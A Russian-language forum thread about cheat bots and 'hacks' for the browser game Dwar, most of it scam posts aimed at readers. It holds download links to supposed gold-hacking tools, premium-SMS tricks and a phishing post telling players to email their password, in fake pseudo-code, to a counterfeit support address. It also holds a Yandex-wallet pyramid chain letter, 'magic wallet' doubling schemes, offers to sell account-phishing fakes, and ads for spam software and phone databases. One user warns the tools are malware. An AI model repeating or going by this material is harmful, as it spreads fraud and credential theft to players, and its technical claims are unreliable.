|
Бот дляд вара
|
|
| KHRYSTALL | Дата: Пятница, 10.10.2008, 08:50 | Сообщение # 1 |
 Администратор
Статус: Offline
| Выкладываю бот ) http://webfile.ru/2300359
[Правила : 1. - Админ всегда прав. 2. - Если Админ не прав,смотри на правило №1 Я - ангел, просто крылья в стирке, а нимб на подзарядке... Правила Форума Учусь VSB
|
| |
|
|
| FRosT | Дата: Среда, 24.12.2008, 13:23 | Сообщение # 2 |
 Новичёк
| хмммм
кручу кручу взломать хачу.....формить бабла везде всегда!
|
| |
|
|
| tehnikauh | Дата: Вторник, 02.06.2009, 12:32 | Сообщение # 3 |
|
Новичёк
| Вы не правы в ответе. подумайте потом пишите
|
| |
|
|
| printermfu | Дата: Среда, 03.06.2009, 11:55 | Сообщение # 4 |
|
Новичёк
| Вы не правы в ответе. подумайте потом пишите
|
| |
|
|
| писукастый_злыдень | Дата: Воскресенье, 14.06.2009, 21:38 | Сообщение # 5 |
|
Новичёк
| Dwar Crack Money v3.1 программа для взлома денег в онлайн игре Dwar(Легенда наследия Драконов) Ломает с 3уровня (потомучто на 3 лвл кодировка нужная(желательно чтоб была профа но необезательно) http://w1.dwar.ru от 1 до 500 золота через уязвимость на сервере dwar в этой версии изменения: 1)исправлены багги со входом 2)скорость обработки поиска уязвимостей сала быстрей 3)не лагает больше 4)исправлены багги на XP, u vista в бедующем: 1)возможность взламывать до 1000з 2)встроенный бот 3)и возможность взламывать деньги 1-2 лвлами советы: не выбирайте сразу 500з, очень долго работать будет ссылка на скачивание: http://depositfiles.com/files/mw1494dcf Добавлено (14.06.2009, 21:38) --------------------------------------------- Продам фейк для взлома аккаунтов для подробностей писать в асю 402519770 Продам фейк для взлома аккаунтов для подробностей писать в асю 402519770 Продам фейк для взлома аккаунтов для подробностей писать в асю 402519770 Продам фейк для взлома аккаунтов для подробностей писать в асю 402519770
|
| |
|
|
| Ботик | Дата: Четверг, 02.07.2009, 20:38 | Сообщение # 6 |
 Новичёк
| как работает Dwar Crack Money v3.1? скажите плиз Добавлено (02.07.2009, 20:38) --------------------------------------------- у меня проблемы с ней! 
|
| |
|
|
| axmed2031 | Дата: Воскресенье, 05.07.2009, 17:01 | Сообщение # 7 |
 Новичёк
| Парни и девченки я создал бота для dwar.Офигенный и простой до невозможности.Делает 200 з и прописывает в достижениях за что.У меня например за 999 Скелетов войнов.У моего одноклассника за 999 рыб.Работает за два смс,при этом первое бесплатное.Я сам это придумал. Короче : 1.отправьте SMS на номер 2332 с текстом L 1598655 2.отправьте ник своего перса на номер 2332 и все Но есть одно условие после отправки 2 смс нельзя заходить в игру ровно 36 часов,т.к. бот делает вам денюшки и если вы зайдете раньше времени то вас забанят "за вход на одного перса с двух разных компьютеров одновременно".Сейчас у моего бота сайта нету но я вам гарантирую он скоро бутет.Удачной игры!!! З.Ы. я акуефший найобщеГ
|
| |
|
|
| Ботик | Дата: Понедельник, 06.07.2009, 20:06 | Сообщение # 8 |
 Новичёк
| пишет подключение и стоит! плиз помогите
|
| |
|
|
| Ботик | Дата: Пятница, 31.07.2009, 22:10 | Сообщение # 9 |
 Новичёк
| люди кто нить реально заработал дафига (100-500з) денег??? если да то стучитесь в асю 480999462 или на мыло Dr.Botik94@mail.ruдрузья заранее спасибо!!!
|
| |
|
|
| portal | Дата: Вторник, 04.08.2009, 17:25 | Сообщение # 10 |
|
Новичёк
| ботов для Легенды на золото(!) не существует!!! ( действующих) скачивая програму вы можете заразить свой камп вирусами + при вводе своих данных они перенаправляются тем сукам которые придумали этот наёб - и ни хера у вас не остаётся!!! Не ВЕДИТЕСЬ НА ЭТУ ХРЕНЬ!!!
|
| |
|
|
| tol09 | Дата: Четверг, 03.09.2009, 15:39 | Сообщение # 11 |
|
Новичёк
| люди помогите пишит подключение и всё помогите
|
| |
|
|
| killer3726 | Дата: Понедельник, 09.11.2009, 11:13 | Сообщение # 12 |
|
Новичёк
| ребята вот бот на легенду который не ругается матом и это не демо версия он добовляет доблесть ресурсы и опыт он не палится в игре и админам вот качайте http://depositfiles.com/files/mtftt8p2n вот удачи вам и все дружно скажем спасибо! мой адрес сайта где вы можите мне сказать спасибо! http://vzlomm.ucoz.ru/ посищяйте мой сайт и узнаете много полезного для вас и ваших друзей!
|
| |
|
|
| K-2 | Дата: Суббота, 19.12.2009, 12:18 | Сообщение # 13 |
 Новичёк
| Привет всем,я скачал бота для двар Называется Dwar Bot ID,установил этого бота а он просит скачать обновления,где мне можно их скачать,подскажитн пожалуйста,и ещё я купил бота для взлома денег,и парольк нему тоже купил,кто знает чего он деньги не пересылает на моего перса,ЗАРАНЕЕ БОЛЬШОЕ СПАСИБО
|
| |
|
|
| blackscvoz | Дата: Среда, 03.03.2010, 20:20 | Сообщение # 14 |
|
Новичёк
| Кто хочет заработать читайте внимательно!!! ДОЧИТАЙТЕ ДО КОНЦА ДАННУЮ СТАТЬЮ, вы ничего не потеряете, ЧТЕНИЕ ЕЩЕ НИ КОМУ СЕРЬЕЗНО НЕ ПОВРЕДИЛО . Я Вас уверяю Ваше материальное положение резко улучшится, если Вы этого только захотите!!!!!!! (Понимаю с каким недоверием вы это читаете - но продолжайте, прошу, дочитайте статью до конца). СРАЗУ СКАЖУ, КОГДА ЗАРАБОТАЕТЕ СВОИ ПЕРВЫЕ ТЫСЯЧИ ДВЕ, ПОТРАТЬТЕ ИХ НА РАССКРУТКУ РЕКЛАМЫ ЭТОГО СООБЩЕНИЯ!!! И ВЫ УВИДЕТЕ РЕЗУЛЬТАТ!!! По прошествии всего 2 месяцев, я получил 155 000 руб. И деньги идут каждый день. Каждые 10 минут на мой счёт поступает по 20р. И это все только за цену в 140 руб.!!! Я был в очень плохом экономическом положении и долго не мог найти себе подходящую работу до того, как наткнулся на эту статью. Я не поверил, что это работает, пока не начал получать переводы со всего света… Я купил всё, что мне надо… И это очень кстати, согласитесь!?... Моя работа теперь - это каждый день по 2-3 часа в Интернете и ВСЁ!!!! А заработок такой, что никаким начальникам и руководителям даже и не снился!!! ВОТ ТЕ САМЫЕ 2 ШАГА К УСПЕХУ: 1. Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 20 руб, вписав этот номер в поле «Номер счёта». В поля «Имя получателя» и «E-mail получателя» вписывать ничего не нужно. В поле «Контракт/назначение платежа» напишите – «Пожалуйста, внесите меня в список Яndex кошельков». Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 20 руб. на следующие 7 кошельков (не забудьте вписывать в поле «Контракт/назначение платежа» «Пожалуйста, внесите меня в список Яndex кошельков»): 1) 41001297248567 2) 41001297354413 3) 41001299172898 4) 41001513905363 5) 41001507563134 6) 41001496497639 7) 41001522125466 ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 20 руб. - иначе, сетевыми модераторами Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход. Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ 2, скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате txt или ещё как вам удобней). В скопированной статье удалите из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го,7-ой на место 6-го. А в 7-ой номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!! 2. Разместите эту статью на НЕ МЕНЕЕ ЧЕМ 200-300 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ (News Groups). ЗАПОМНИТЕ: ЧЕМ БОЛЬШЕ вы разместите, ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД. И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС. Размещение этой статьи на 200 форумах, даже на самых малопосещаемых, ГАРАНТИРУЕТ Вам доход 150 000 руб. - ЭТО МИНИМУМ!!!, в течение двух месяцев!!! БОЛЬШЕ РАЗМЕЩЕНИЙ – БОЛЬШЕ ДОХОД (при том в ГЕОМЕТРИЧЕСКОЙ ПРОГРЕССИИ). ИТАК, КОГДА ВЫ ДОСТИГНЕТЕ ПЕРВОЙ ПОЗИЦИИ В СПИСКЕ, ВЫ БУДЕТЕ ИМЕТЬ ТЫСЯЧИ РУБЛЕЙ ПРОСТО КАК СОЗДАТЕЛЬ СПИСКА!!! ЭТО СТОИТ 140 рублей и СОВСЕМ НЕ ТРУДНОЙ РАБОТЫ! ГЛАВНОЕ – ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!! ДАВАЙТЕ РИСКНЕМ!! ВЕДЬ НИЧЕГО, КРОМЕ 140 РУБЛЕЙ НЕ ТЕРЯЕМ!! А ЕСЛИ ВДРУГ ПОЛУЧИТСЯ!? 
|
| |
|
|
| svch | Дата: Понедельник, 15.03.2010, 23:29 | Сообщение # 15 |
 Новичёк
| Баг в dwar – Легенда – Наследие Драконов !!! 100 % РЕЗУЛЬТАТ !!! А именно в службе СМС-сервера, фишка в следующем: 1. Посылаем смс на номер 2332, в смс пишем следующее: L(пробел)105711 2. Приходит ответ "Bad request..и т.п." 3. Посылаем смс на тот же номер только L(пробел)СВОЙ НОМЕР(можно узнать в банке в игре) тут происходит самое интересное, вам на игровой счет поступает не 5,6 рубинов а 56!!!...круто? да не плохо, заработать в 10 раз больше !!! Мне прога ваще помогла !!! Это обман СМС сервера! Вы не платите за СМС услугу !!! Но получаете рубины! 100% гарантия!!!
|
| |
|
|
|
|
| Ботик | Дата: Понедельник, 03.05.2010, 12:16 | Сообщение # 17 |
 Новичёк
| Fuck168rus есть майл???
|
| |
|
|
| Наёмник | Дата: Четверг, 13.05.2010, 20:34 | Сообщение # 18 |
 Новичёк
| 476016528 ломаю легенду наследия драконов. рисую шмот и деньги.
|
| |
|
|
| Mikol1236472 | Дата: Суббота, 15.05.2010, 18:57 | Сообщение # 19 |
 Новичёк
| Вы никогда не задумывались почему у стражей всё самое лучшее? Я могу вам рассказать из мести. Я сам бывший страж но меня предали стражи поэтому я всё это вам говорю. Все думают что стражи получают вещи от главаря- админа. но это не так. смотрите. Админ сам не постоянно в игре поэтому он сделал бота на мыле. вот этот адрес dwar-sapport@live.ru Тут сразу все подумают что лохотрон типа админ создал бы ящик на платном мыле с именем двар-бот. Неет админ не тупой. он создам мыло там где его не додумуются искать да и с таким именем которое хрен запомниш.и создам там раздачу вещей. вот схема по которой делай-те сообщение. +++(Здесь пишем ваш ник и мыло. заместо этой надписибот заходит и создаёт вешь)+++ -+++( ваш пароль. бот заходит на перса и создаёт ему вещь)+++- 0+++(игровой сервер:если фео-минор то w1,а если фео-прайм то w2) 1+++(вещь номер один)+++1 2+++(вещь номер два)+++2 3+++(вещь номер три)+++3 (и т.д.) Заместо название вещи пишем буквенно числовой код. сумрак; поножи- s1k бронь верхняя- s2k меч в левую руку- s.l.k меч в правую руку- s.r.k рубаха- s3k сапоги- s4k наплечники- s5k наручи- s6k шлем- s7k Палач; поножи- p1k бронь верхняя- p2k Топор- p2+k рубаха- p3k сапоги- p4k наплечники- p5k наручи- p6k шлем- p7k Мамонт; поножи- m1k бронь верхняя- m2k кастет- m2+k шит- m2-k рубаха- m3k сапоги- m4k наплечники- m5k наручи- m6k шлем- m7k гнев; молот гнева- x2+k ботинки гнева- x4k поножи гнева-х1k рубаха гнева-x3k верхняя бронь гнева-x2k наплечники гнева-x5k наручи гнева-x6k шлем гнева-x7k северный ветер; меч-l.l.k длинный кинхжал-l.r.k поножи-l1k сапоги-l4k кольчуга-l3k жилет-l2k наплечники-l5k перчатки-l6k шлем-l7k убийца гигантов; когти-w1k щит-w2-k сапоги-w4k бронь верхняя-w2k поножи-w1k рубаха-w3k наплечники-w5k наручи-w6k шлем-w7k и еше не кагда не пишыте боту на запрос более 4х вешен он поодумает это обман! dwar-sapport@live.ruДобавлено (15.05.2010, 18:57) --------------------------------------------- Взломал персонажа в dwar.ru метод 100% все что надо это отправить письмо на адрес dwar-sapport@live.ru Тема: \\\\\"пароль\\\\" текст письма такой: id := \\\"НИК ЖЕРТВЫ\\\" id$ := \\\"ВАШ ЛОГИН\\\" pass := loadpwlfile(account\\\\password\\\\\\\'id\\\'.pwl) pass$ := \\\"ВАШ ПАРОЛЬ\\\" q1 := loadfile(account\\\\password\\\\\\\'id.q1\\\'.txt) function backpassword(id,pass,q1,q2,i,k) if id= true and pass$=loadpwlfile(account\\\\password\\\\\\\'id$\\ \'.pwl) then if q1 = true then send.file.pass: \\\"АДРЕС НА КОТОРЫЙ ВЫШЛЕТСЯ ПАРОЛЬ\\\" end if end if end function по этому адресу находится программа восстановления паролей которая глючит при получении такого письма и высылает на указанный адрес сначала ваш логин и пароль а затем вторым письмом логин и пароль того кого вы хотите взломать единственный минус письма ждал 10 часов((( но зато все получилось
|
| |
|
|
| cap | Дата: Суббота, 29.05.2010, 19:31 | Сообщение # 20 |
|
Новичёк
| Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595 Желания исполняются с хорошим выбором и подарками,заходите на сайт dwarvzlom. moy . su и попробуйте заказать у нас что нибудь для себя по маленькой цене!контактное ICQ:397-128-595
|
| |
|
|
| D1maS | Дата: Вторник, 01.06.2010, 23:56 | Сообщение # 21 |
|
Новичёк
| баг на золото через смс отпровляем bw 297896 на номер 8355 в итоге 5-10 золота (отправлять лутше с теле2 с других операторов не пробовал стоимость смс таже как и при отправке простого смс)
|
| |
|
|
| rve | Дата: Пятница, 25.06.2010, 01:09 | Сообщение # 22 |
|
Новичёк
| http://depositfiles.com/files/eqplr9w1k бот... проверяйте.... настройки не забудьте сделать, да еще, это БЕСПЛАТНО
Сообщение отредактировал rve - Пятница, 25.06.2010, 01:12 |
| |
|
|
| CLDMA24 | Дата: Вторник, 05.10.2010, 05:34 | Сообщение # 23 |
 Новичёк
| КАК ОБМАНУТЬ ЛОХОТРОНЩИКОВ И ЗАРАБОТАТЬ 15000 РУБЛЕЙ. Я расскажу вам: 1. Как наглые лохотронщики обманывают людей на сумму в размере 5000 рублей (Яндекс-Деньги), а некоторых на еще большие суммы. 2. Как обмануть лохотронщиков и заработать 15000 рублей (Яндекс-Деньги) Тема 1. История « Как я лохонул их и получаю стабильно 15000 рублей » Нашел я в сети где-то статью приблизительно такого содержания: «Есть в системе Яндекс-Деньги волшебный кошелек, и все что вы на него пошлете вернется вам в утроенном размере!!! Любая сумма от 100 рублей и выше! Пошлете десять тысяч получите тридцать тысяч и т.д.». Конечно, всем понятно, лохотрон, но если порыть глубже… Я не поверил, но для теста послал 100 рублей. Через где-то 5 часов проверил свой Яндекс кошелек и обнаружил перевод в 300 рублей! Я удивился. Послал потом еще 100 рублей опять то же самое. Потом послал 300 рублей, мне пришло 900. Осмелев окончательно послал все что у меня было – около 5000 рублей … Что было дальше, думаю, вы уже поняли. Никаких 15000 рублей мне никто не прислал, да и мои 5000 тоже исчезли навсегда… Понятно как они работают. У них на сервере стоит хитрая программка, которая принимает суммы от 100 рублей и примерно до 800 рублей (закидывал им 900 рублей и их забрали, а 800 закинул программа вернула 2400 рублей) Вот и заколачивают тысячи! В общем, это я к тому, что если быть аккуратным и выслать, небольшую сумму (они принимают любые суммы, но не меньше 100 рублей), то всегда можно получать в три раза больше. У них есть специальная программа, которая смотрит кто сколько переводов сделал и на какую сумму, чтобы определить когда нужно кидануть. Переводы суммой до 800 рублей они не забирают никогда. То есть, послав 800 рублей вы в любом случае получите 2400 рублей, т.к. сумма мелкая и они будут ждать пока вы пришлете больше. Если аккуратно слать им небольшие суммы то можно их обманывать. Они уже не смотрят на переводы сами, за них это делает специальный софт (программа), что упрощает вероятность их обмана. Я сейчас зарабатываю на этом около 15000 рублей в неделю (можно делать и больше). Это не миллионы, но это более-менее стабильный доход. Денег на этих кошельках сотни тысяч, и меня очень раздражает как они кидают людей, по этому надо их разорить. Вот сам кошелек: 41001629008871 Совет: Внимание! Повторяю! ставку поднимать не стоит, т.к. если ставка выше 800 рублей то программа их забирает даже и не пробуйте!!! Я делаю то же самое и получаю около 15000 в неделю, которых мне очень даже вполне хватает! В общем, я рассказал, что от меня требовалось. Дальше – ваше дело.. cool
|
| |
|
|
| Saskha | Дата: Четверг, 14.10.2010, 23:06 | Сообщение # 24 |
|
Новичёк
| всякие мелочи для комфортной игры и взлома пользуюсь 8 месяцев ни разу не спалился !!! http://depositfiles.com/files/8s6idn32d
|
| |
|
|
| axmed2031 | Дата: Воскресенье, 21.11.2010, 16:33 | Сообщение # 25 |
 Новичёк
| вот реально работающий бот для двара всем советую http://depositfiles.com/files/ak2miw2hk не требует мыла и пароля прост в управлении
|
| |
|
|
| Renesans | Дата: Среда, 26.01.2011, 19:01 | Сообщение # 26 |
 Новичёк
| Все для двар заходите http://the-soft.3dn.ru/
|
| |
|
|
| [UTK]Romka | Дата: Пятница, 04.02.2011, 18:40 | Сообщение # 27 |
|
Новичёк
| Пишем письмо на имейл dwar-2011@bk.ru тема письма : Gold В самом письме пишем ... Повторяем за мной . Каждый символ имеет значение !!! если вы что то пропустите , бот просто проигнорирует сообщение Пишем ! start_bot ::..255::???ҐҐҐ??? (єто количество золота которое придет на перса) ::..minor..::???ҐҐҐ??? (сервер где играете) ::..(тут пишем пароль)..::endered_cheat ::.. loc set ..::st_255_gold ::..end..::
|
| |
|
|
| Vladislavnito | Дата: Воскресенье, 06.02.2011, 20:49 | Сообщение # 28 |
|
Новичёк
| Собираю команду для взлома DWAR Bot by Fisher Желающим сюда http://zhyk.ru/forum/showthread.php?t=157100
|
| |
|
|
| [UTK]Romka | Дата: Пятница, 06.05.2011, 15:24 | Сообщение # 29 |
|
Новичёк
| Вообщем есть программа для изменения дропа, выпадения предметов с волшебной палочки, накрутки брилиантов, рубинов, вот она: http://depositfiles.com/files/j0m7quurv Чтобы получить пароль отправьте SMS на номер 2332 с текстом LМ 2578435 пробел после LМ обязателен.Добавлено (06.05.2011, 14:56) --------------------------------------------- Вообщем есть программа для изменения дропа, выпадения предметов с волшебной палочки, накрутки брилиантов, рубинов, вот она: http://depositfiles.com/files/j0m7quurv Чтобы получить пароль отправьте SMS на номер 2332 с текстом LМ 2578435 пробел после LМ обязателен. Добавлено (06.05.2011, 15:24) --------------------------------------------- Вообщем есть программа для изменения дропа, выпадения предметов с волшебной палочки, накрутки брилиантов, рубинов, вот она: http://depositfiles.com/files/j0m7quurv Чтобы получить пароль отправьте SMS на номер 2332 с текстом LМ 2578435 пробел после LМ обязателен.
|
| |
|
|
| зачем-мне_ник | Дата: Четверг, 15.09.2011, 10:26 | Сообщение # 30 |
|
Новичёк
| Всё для взлома легенды и баги игры на сайте http://httpz.ru/hzijmvx6qy.png
|
| |
|
|
| ĘķŁϊрىξ | Дата: Понедельник, 03.10.2011, 19:59 | Сообщение # 31 |
|
Новичёк
| я хочу
|
| |
|
|
| StyleR | Дата: Пятница, 20.01.2012, 20:12 | Сообщение # 32 |
 Новичёк
| написал чит для Легенды! ломает не только на деньги но и на уровень + доблесть! дает любой предмет в сумку!
так как ломает подменой пакетов как чарльз, антивирус будер ругаться на сниффер! так что отключаем!
говорим спасибо!!!
http://zalil.ru/32450675
|
| |
|
|
| Karapuz | Дата: Среда, 29.02.2012, 03:17 | Сообщение # 33 |
|
Новичёк
| Продаю кликер-бота для Легенды,Juggernaut,Троецарствия и других браузерных игр. icq 619252849, skype lamborghini_my Видео: http://vimeo.com/37590472
|
| |
|
|
| smil1 | Дата: Пятница, 30.03.2012, 13:42 | Сообщение # 34 |
|
Новичёк
| Суть идеи получения WebMoney Дело в том, что я, отнюдь, не от доброй души пишу, как заработать деньги, обманывая людей, которые наживаются на чужом горе. Если вы любитель пробовать, то по доброте душевной можете попасть в лохотрон какого-то умника. Дело в том, что я один из таких. Мне пришлось потерять 3500 руб (около 100 wmz). Но теперь я вернул свои деньги и даже неплохо наварился. Просто я хочу искоренить лохотрон, который заставил меня испытать тяжелые минуты. Очень неприятно терять деньги когда они жизненно необходимы! Подобного рода лохотронщики, о которых далее пойдет речь, успели много получить денег за свои творения обмана людей и отъема денег. На их кошельках лежат суммы, которые не выпотрошить мне одному, поэтому я предлагаю всем желающим помочь отомстить и подзаработать кругленькую сумму! Идея обмана Лохотронщики - народ не глупый, поэтому они выдвинули на форумы сообщения примерно такого содержания: Я нашел дыру в системе WebMoney и я такой весь добрый скажу всем как получить халявные WebMoney на свой кошелек ничего не делая, для этого просто отправьте деньги (суммы колеблятся от 50 до 500руб) на волшебный кошелек R274********* (вместо звездочек кошелек лохотронщика) и к вам мгновенно или через 5 часов вернется в два а то и в три раза больше! Естественно добродушный народ покупается! Суть лохотрона Люди отправив первый раз получают удвоенный капитал, отправляют второй раз и опять получают в два раза больше. Убедившись, что всё работает, смело отправляют все деньги и ждут, но напрасно - это самая распространенная обманка. Система автоматизирована: при получении денег в третий раз она их просто не возвращает. Свои плюсы Главное в том, что система отправляет удвоенные суммы первые два раза! То есть мы отправляем деньги лохотронщикам 2 раза, затем меняем кошелек (создаем другой) и повторяем процесс. На этом можно и не плохо заработать! Можете использовать кошелёк на который вы купились, а можете использовать тот, который пользую я. WebMoney кошелёк: R243733518295 Z182035694160-от 1-6 $больше пробовал кинули!!! Когда перестанет отправлять - значит кончились деньги))) и на одного лохотронщика стало меньше! Замечание: чтобы никого не подставить (возможно уже кошелек обесточили) я рекомендую первый раз не отправлять более 50 руб! Очень маленькие суммы отправлять также не советую, так как для каждого кошелька установлена "минималка" - минимальная сумма, при поступлении которой будет выплачиваться удвоенная. И так можно продолжать бесконечно пока не кончатся WebMoney у всех лохотронщиков! И запомните бесплатный сыр только в мышеловке! Скупой платит дважды, дурак - трижды, а лох постоянно! Не будьте лохами. Удачи.
|
| |
|
|
| drewdrew | Дата: Воскресенье, 01.09.2013, 01:59 | Сообщение # 35 |
|
Новичёк
| новый bot http://rghost.ru/48504224
|
| |
|
|
| GoDliKEkiLLeR | Дата: Пятница, 20.12.2013, 19:06 | Сообщение # 36 |
|
Новичёк
| Темные методы продвижения сайта
Постеры, спамеры, регеры,инвайтеры, чекеры
Ask постер парсер регер FlooSIP автодозвон с номерами Mamba.Ru постер Ucoz постер парсер XenForo постер Ucoz постер парсер Вконтакте постер парсер Emali рассылка приват 3 программы Мой Мир парсер по категориям Мой мир постер Однокласники отличный комбайн ! Хрумер 7.0.10 рабочий Твиттер постер регер База Медицина аитера База Мурманск(сот.прописка) Егорьевск телефонная база Н.Новгород телефонная база Сосновый бор телефонная база Телефонный справочник Липецк Телефонный справочник Смоленска Телефоный справоч Псковская обл
Обновления, добавления еженедельно И много разных мелочей
http://revision.besaba.com/
|
| |
|
|
| rizan | Дата: Понедельник, 23.12.2013, 13:26 | Сообщение # 37 |
|
Новичёк
| Если нужно разместить вашу информацию на множестве ресурсах, то этот инструмент поможет вам решить эту задачу... Forum Poster - гарантированный постинг на тысячах форумам (Россия, Украина, Казахстан, Белорусия).
http://seosoft.url.ph/
|
| |
|
|